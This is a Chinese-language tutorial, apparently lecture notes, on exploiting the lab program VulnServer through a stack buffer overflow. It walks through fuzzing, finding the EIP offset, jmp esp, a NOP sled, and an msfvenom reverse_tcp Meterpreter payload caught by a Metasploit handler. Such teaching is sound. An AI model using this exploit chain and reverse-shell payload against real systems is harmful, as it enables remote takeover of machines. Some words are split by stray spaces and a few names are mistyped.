编写你的第一个Exploit

1.实验设置
a.虚拟机
i.windows虚拟机
https://developer.microsoft.com/en-us/microsoft-edge/to        ols/vms/

ii.kali虚拟机
https://www.kali.org/downloads/

b.软件安装
i.下载windows虚拟机上的VulnServer
http://www.thegreycorner.com/2010/12/introducing-vulns        erver.html

ii.下载windows虚拟机上的Immunity
http://debugger.immunityinc.com/ID_register.py

iii.下载windows虚拟机上的mona.py
https://github.com/corelan/mona/blob/master/mona.py
下载完成后，放置在例如如下路径下：
C:\ProgramFiles\ImmunityInc\ImmunityDebugger\PyCom        mands

iv.下载windows上的arwin.exe
http://www.fuzzysecurity.com/tutorials/expDev/tools/arwi        n.rar

2.c语言中的缓冲区溢出
a.简单的c程序
1.Printf
printf()函数用来将数据打印到屏幕上，经常会用到替换功能。

printf（“hello”）会在屏幕上输出hello，而下面的语句：
char name［5］=“Rob”
printf（“hello %s”，name）
则会输出hello Rob。

2.Strcpy
strcpy用来将一个字符串拷贝到另一个地方。该函数不会去检查        目的地能否装得下复制源的字符。如果复制源的字符串长度超过        了目的地的容量，那么复制过程依然会进行，同时超出的数据就        会被复制到目的地的后面。

b.缓冲区溢出的例子
simpleoverflow.c

c.函数调用与栈
1.进行了函数调用后的栈会以相同的方式分配同样大小的内存。
        序运行每个函数的本地栈都会以相同得方式创建和销毁。
        存器中找到，这个寄存器被称为EBP。在下面的伪代码中，变量        x的偏移将会是0，因为他是栈中的第一个变量。因此x在栈上的        地址可以用ebp+0来描述。如果我们假设整形是4字节长，那        么接下来的一个变量--字符型，取名为c--的偏移将会是4。同样，        如果字符串的长度为一个字节，那么z的偏移为5。

当一个函数被调用的时候，比如说主函数中的函数f--控制权将会        被转交给函数f，然而主函数依然需要被完成。主函数必须在I1 处        恢复恢复执行。因此，在将控制权交给函数f的时候I1处的地址        和指向main函数本地栈的指针必须被保存下来。如果I1处的地        址没有保存，那么main函数就不能被恢复执行。如果是本地栈        指针没有被保存，那么main函数恢复的时候就不能再访问在调        用函数f之前的数据了。

因为每一个变量是“面向远离”栈的基址的（其实就是栈的增长方式是从高地址向低地址），写入到变量Z中的数据将会向栈基址蔓延。在上图中，比较容易观察溢出Z的内容的后果，Z中超出的数据将会溢出到c和x中。如果有足够的数据被输入进去，那么他甚至可以覆盖掉在函数调用时保存的所有的控制信息。

这就是缓冲区溢出利用的目标。想要将很多的数据输入到一个脆弱变量上，然后导致溢出从而覆盖掉函数的返回地址。一旦我们可以预测到返回地址放置在哪里，我们就可以用一个跳转指令的地址来覆盖原来的返回地址，而这个跳转指令会重定向程序的执行路径，使其在函数g()完成后转而执行我们的payload。我们基本是劫持调用了函数g()的函数的栈来确保我们的payload的执行。

3.python简单socket编程
a.基本脚本结构
i.import
import命令会加载一个库。我们可以使用socket和sys库。

ii.缩进携带语义内容
Python中的制表符与大多数其他编程语言中的大括号一样具有相同的功能：指定要包含在控件结构体中的指令。

b.socket.socket()
语句：
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
创建了一个socket类型的实例，名字叫conn.常量socket.AF_INET 表明这个一个IPv4的套接字。常量socket.SOCK_STREAM 表明她会使用TCP链接。

c.socket.connect()
语句：
conn.connect((“192.168.1.2”, 80))
让之前创建的套接字实例用三次握手的方法去链接一个指定的IP和端口。注意那个IP是一个字符串，而端口号是一个整型.同样要注意双重双括号的设置；connect函数需要一个参数 - 一个有序对。

D.socket.recv()
语句：
Conn.recv(1024)
这将会尝试从套接字中读取1024个字节的数据。这是一个块读取；脚本会一直等待直到1024个字节都被读取了或者是遇到了空字符。

e.写一个横幅抓取器
看bannergrabber.py

4.python中有用的socket编程
a.Sys.argv
一个开发者可以通过使用sys库来从使用者那里获取        命令行参数。Sys.argv[]就是一个从命令行那个获取到        的数据的数组。
如果我运行命令：python print_name.py Rob                 6,sys.argv[0]将会是print_name.py。Sys.argv[1]将会是        Rob，然后sys.argv[2]将会是6.

b.for loops
所有for循环指定循环开始的值，循环终止的值和增        量。 在python中，语法是：
For i in range(0,10):
Print “Hello Rob”
c.socket.settimeout)()
.settimeout()函数允许程序员指定在socket()抛出时间耗尽异常前的最大等待时间。比如：conn.settimeout(5)
d.try/except
i.Syntax
try:
Some code
except:
code to execute on any error
OR
try:
some code
exept socket.timeout:
code to execute on socket timeout error

ii.socket.error
当一个已经链接的套接字收到RST的时候会抛出这个        异常。

iii.socket.timeout
当套接字在等待了一些时间后没有收到任何数据的        话，就会抛出这个异常。

e.写一个端口扫描器
看port-scanner.py

5.Fuzzing
a.socket.send()
.send（）函数通过已经连接的套接字传输数据。 到达        目的地以适当地处理该数据。

b.与网络服务进行交互
大多数网络服务命令具有以下语法：
<command> <argument> \ r \ n
例如，通过SMTP指定用户使用user命令：
user rob \ r \ n

c.Fuzzing
Fuzzing是尝试增量更多的恶意输入，直到应用程序崩        溃的过程。 在上面的情况下，可以fuzz SMTP用户命        令通过尝试更长和更长的用户名来引发缓冲区溢出：
for i in range(0,10000,10):
badname=”A”*i
conn.send(“user %s\r\n” % badname)\
这将会尝试长度在0到10000之间，步长为10的        uernames。

d.写一个模糊测试器。
i.我们将在vulnserver上模糊测试RUN命令。 请注        意，当命        令的参数以句点开头时，TRUMP仅易受缓        冲区溢出的影响。

ii.看fuzzer.py

e.在immunity中观察崩溃
当在immunity中观察的时候，你得注意eip值。 这        将指示您的恶意输入的哪部分正在覆盖堆栈上保存        的指令地址。当脆弱的函数返回时，您的恶意输入        将从堆栈中删除，并加载到指令指针，就像它是一        个真正的指令的地址。
6.控制崩溃
a.微调你的崩溃
通常我们需要精确的知道崩溃发生的位置；具体是那        些字节覆        盖了指令地址。然而模糊测试却经常留给我        们一个大致的范围。        为了精确查找这个地址，我们可        以通过从模糊器中删除for循        环并向我们的恶意输入        添加一些区分来微调它。比如，如果你知        道一个70字        节的溢出将会导致崩溃，你可能使用下面的恶意字        符        串：
Badstr=”A”*70+”B”*4+”C”*10
如果你观察到任何的\x41出现在了寄存器里，如此你        就有了太        多的“垃圾”，你可能需要按照如下的方法调        整：
Badtr=”A”*68+”B”*4+”C”*10
如果你观察到任何的\x43值，你又没有足够的“垃圾”，        你可        能得像下面这样调整：
Badstr=”A”*72+”B”*4+”C”*10
这样的目的是微微调整exp，直到你的eip寄存器在崩        溃的时候        读取的值是\x42\x42\x42\x42。这就是在告诉        你赶紧把重定向        用的指令的地址写进去吧。

b.定位跳转指令
这个特定的exploit需要一个跳转指令来将代码的执行过程引导        到栈顶(jmp esp).Immunity Debugger 有一个查找工具可以允        许你查找一些特定的指令。要想使用它，可以通过在反汇编窗口        中右键。
注意，因为现代的计算机有些会采用小端法来存一些非单字节类        型的数据，所以在你找到的任何地址都需要重新排列一下他们的        字节顺序。如果Immunity指示在地址12345678发现了一个跳        转指令，那么你应该按照以下的方式将其插入到你的exploit中：
eip=”\x78\x56\x34\x12”
这些指令可能不会一直都是很容易得到的。Immunity有一个模        块视图工具(可以通过悬停在应用程序顶部的控件上找到),他可以        让你查看应用程序加载了的所有模块。通常，只要这些模块没有        开启ASLR的话，从他们中的任何一个中挑选的跳转指令都是足        够使用的。

ASLR是一种技术，旨在通过在每个程序运行期间将指令加载到        不同的地址来最小化可以利用缓冲区溢出漏洞的程度。 我们可以        通过使用mona.py来确定哪些模块支持ASLR。
在Immunity窗口底部的栏中，键入：
!mona moudles
任何加载的模块不开启ASLR也应该工作。 对于VulnServer，        vulnserver.exe和essfunc.dll同样如此。 然而，Vulnserver.exe        没有任何jmp esp指令。
c.添加NOP底座
在理想情况下，我们将能够以以下方式构造漏洞：
badcmd=garbage+eip+payload
然而，实际上，当发生函数调用时可以保存附加控制数据。 结果，        堆栈指针 - 我们跳转到的地址 - 可能不会指向紧接在保存的指        令地址之前的字节。

要解决这个问题，就只有填充NOP。NOP被汇编为“无操作”        或者是“不作为”。通过在我们的恶意字符串中的跳转地址和有        效载荷之间插入一系列NOP，我们可以保证有效载荷被执行。只        要jmp esp指令将代码执行重定向到任何一个NOP，其余的将        被执行 并且处理器将“滑动”直到它击中有效载荷。

7.完成Exploit
a.生成payload
可以使用以下bash命令生成reverse-tcp meterpreter stager        有效内容。 注意，标志（-b）和该标志（\ x00）的值之间始终        有一个空格。、
msfvenom –p windows/meterpreter/reverse_tcp
        LHOST=<YOURIPHERE> LPORT=8421 –b \x00 –e
        x86/shikata_ga_nai –f python
-p 指示payload将会被编码。
LHOST和LPORT值是meterpreter有效负载的参数。注意：        HOST必须是Kali VM的IP。

-b 引用不能出现在shellcode中的字节。提供的示例，        空        字        节（\ x00）终止套接字读取。如果出现在有效载荷        中，它将终止        有效载荷的套接字读取。这里可能还有        其        他特殊字节。

-e指定有效负载的编码方案。 它会显示为shellcode？                 Powerscript？

-f指定exploit的语言。您将能够简单地复制并粘贴        msfvenom的输出到您的exploit。

一旦生成了有效载荷，它只需要在nop sled之后附加到恶意字符串。 在这一点上，你的恶意字符串的结构应该是：
garbage = "A" * 2006
        eip = "\xAF\x11\x50\x62"
        nop_sled = "\x90" * 24
        buf=””
        buf+=<code omitted for brevity>
badstr=garbage+eip+nopsled+buf+”\r\n”

b.设置handler
在单独的终端选项卡中，我们可以运行命令msfconsole来启动        Metasploit控制台。 一旦Metasploit控制台打开，我们将运行        以下命令序列来启动Meterpreter处理程序：
use multi/handler
        set payload windows/meterpreter/reverse_tcp
        set lhost <yourkaliIP>
        set lport <someport>
        exploit

c.Exploitation
在这一点上，你应该准备好试用你的exploit。 运行你的exploit        脚本后，Meterpreter处理程序应该告诉你你有一个打开的        Meterpreter会话。
看exploit.py

8.写一个自定义的payload(如果时间允许的话)
看custom-payload-calc.py and custom-payload-add-user.py

9.参考

参考列表可以在演讲笔记开头列出的GitHub存储库中找到。

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课